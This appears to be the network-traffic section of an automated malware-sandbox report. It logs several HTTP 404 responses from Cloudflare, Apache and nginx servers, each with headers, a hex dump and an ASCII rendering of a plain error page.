3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lx6tld4bcQrQ9l%2BsJmRuAzfA2d2yfC9iTswCWaKBTuh1ASCuj%2FPmE2%2Bszg9%2FgeZOEVEanS1cSlHPGt%2ByeAY48dbfs%2FQBN7jfyYtnEYZxUHJEbE3vj0iezcVPdIX44K654Kil7FIA9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e67064b5e907d16-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1769&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=616&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 92 91 b5 5b fd 03 ba 24 65 85 a4 29 5b ca 28 63 14 59 3a db 2a 8e e4 49 4a 42 9a f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 47 c3 e9 60 76 7f 3b 42 5f 67 93 31 ba bd fb 32 be 1e a0 f6 29 21 d7 a3 d9 15 21 c3 d9 b0 89 7c f0 ba 84 8c 6e da 51 2b c8 ec 3c 8f 82 0c 28 8f 5a 81 15 36 87 a8 df ed a3 1b 65 d1 95 5a 48 1e 90 e6 b0 15 90 1a 14 c4 8a af 2b 5e 2f 3a c0 64 bd a8 15 14 d1 2c 03 a4 e1 f7 02 8c 05 8e ee be 8d d1 8a 1a 24 95 45 49 85 43 4a 22 9b 09 83 0c e8 25 68 2f 20 45 4d bb e4 5c 58 a1 24 cd f3 75 07 51 f4 57 01 2d d0 5a e9 3a 11 48 a6 16 d2 82 06 8e 56 99 c8 01 59 bd 16 32 45 56 a1 85 01 44 25 1a 55 e0 a1 62 8b 39 48 5b 9d 67 54 f2 0a f8 52 d9 4e d6 30 2d 0a 1b 39 c9 42 b2 4a dc 71 37 cf 4b c4 1c 77 b3 a4 1a c5 21 f5 98 92 16 a4 7d ce b9 dd ee 8f 7e 08 c9 d5 ca e3 bb 88 2f 12 27 6e 78 3c 8c 3d a6 81 5a 18 e5 50 c5 1c dc c8 61 d7 e7 9e 90 12 74 75 0f 61 7b d5 a4 78 78 18 5c 1d b3 e5 71 41 35 9d 9b 70 a3 2f f0 27 38 3b ef 9e f5 e3 8f f0 b9 7b ce 7b 67 b8 63 2f f0 64 c6 9e 26 8f d7 bd e9 f0 fe 69 3a e8 af 26 c3 cb ea 0b 71 e9 57 b2 34 7c ae e5 4d 75 ea 49 25 19 84 18 fb d4 33 9a 85 98 30 2e 4f 59 2a 08 cb 68 9e 83 4c e1 b4 c8 a9 4d 94 9e 93 86 66 c8 a3 e1 64 4e 85 f4 1e Data Ascii: 2a8Tk0B![$e)[(cY:*IJB4+c{wgG`v;B_g12)!!|nQ+<(Z6eZH+^/:d,$EICJ"%h/ EM\X$uQW-Z:HVY2EVD%Ub9H[gTRN0-9BJq7Kw!}~/'nx<=ZPatua{xx\qA5p/'8;{{gc/d&i:&qW4|MuI%30.OY*hLMfdN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SID2QwSk%2BPOSiw0rW%2FIo2WX88yWRZ1Bznn1mOwHD5k05Idpzy7vlJygkc1qRm9xV0rg96Ip9R%2B4nGYALhARMUiMtLBgjjT1EejHi5nOq07qxpfY37KLKoXXbBRPV8B6fmoxplGKyEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e67065c3ac4558f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=636&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 92 2d ed 4a fd 03 da 24 65 85 a4 2d 6b ca 28 63 14 59 3a db 2a 8e e4 49 4a 42 96 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 07 c3 db c1 f4 f1 6e 84 be 4e 27 63 74 f7 70 39 be 1e a0 f6 31 21 d7 a3 e9 15 21 c3 e9 b0 89 7c f2 ba 84 8c 6e da 51 2b c8 ec 2c 8f 82 0c 28 8f 5a 81 15 36 87 a8 df ed a3 1b 65 d1 95 9a 4b 1e 90 e6 b0 15 90 1a 14 c4 8a af 2a 5e 2f da c3 64 bd a8 15 14 d1 34 03 a4 e1 d7 1c 8c 05 8e 1e be 8d d1 92 1a 24 95 45 49 85 43 4a 22 9b 09 83 0c e8 05 68 2f 20 45 4d bb e0 5c 58 a1 24 cd f3 55 07 51 f4 57 01 2d d0 5a e9 3a 11 48 a6 e6 d2 82 06 8e 96 99 c8 01 59 bd 12 32 45 56 a1 b9 01 44 25 1a 55 e0 a1 62 f3 19 48 5b 9d 67 54 f2 0a f8 5a d9 56 d6 30 2d 0a 1b 39 c9 5c b2 4a dc 71 d7 2f 4b c4 1c 77 bd a0 1a c5 21 f5 98 92 16 a4 7d c9 b9 d9 ec 8e be 0b c9 d5 d2 e3 db 88 2f 12 27 6e 78 3c 8c 3d a6 81 5a 18 e5 50 c5 1c dc c8 61 d7 e7 9e 90 12 74 75 0f 61 7b d9 a4 78 7a 1a 5c 1d b2 c5 61 41 35 9d 99 70 ad cf f1 19 9c 7e e9 9e 9e b0 cf 94 f5 4f 4e ce 12 dc b1 e7 78 32 65 bf 27 cf d7 bd db e1 63 77 72 df 5f 4e 86 17 d5 17 e2 d2 af 64 69 f8 52 cb bb ea d4 93 4a 32 08 31 f6 a9 67 34 0b 31 61 5c 1e b3 54 10 96 d1 3c 07 99 c2 71 91 53 9b 28 3d 23 0d cd 90 67 c3 c9 8c 0a e9 3d 1b ec ef 34 52 b0 Data Ascii: 2b3Tk0B!-J$e-k(cY:*IJB4+c{wgnN'ctp91!!|nQ+,(Z6eK*^/d4$EICJ"h/ EM\X$UQW-Z:HY2EVD%UbH[gTZV0-9\Jq/Kw!}/'nx<=ZPatua{xz\aA5p~ONx2e'cwr_NdiRJ21g41a\T<qS(=#g=4R
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cmUnu1IYDT74XUTHcoWoBgyN84S8VRCRHcyYhcPamaHDBHswDwex9jk5nYOuEadz5iefBNT8nKypGXeLQq%2F6iiRcw2PH0my%2FjhlaQFekEbFfF3dDwq8otLiYuC03r30nzlvSOENQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e67066c9e4d440d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1530&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1653&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brVa9GSdK4llpNGUeu5AxwXCeBEXy57MyT5MYTdg4oDXKzqXACGcz9QaGPFFSjhCOKj74tQoI0VOafq7vLVUDvFt5AU9Vs1D3U%2BVn0bL6g%2BooW1uuRSVXLg6PQv1VdYj6hA5UVJRow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e67067d8fa6422e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=354&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:57:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 06:57:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 06:57:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 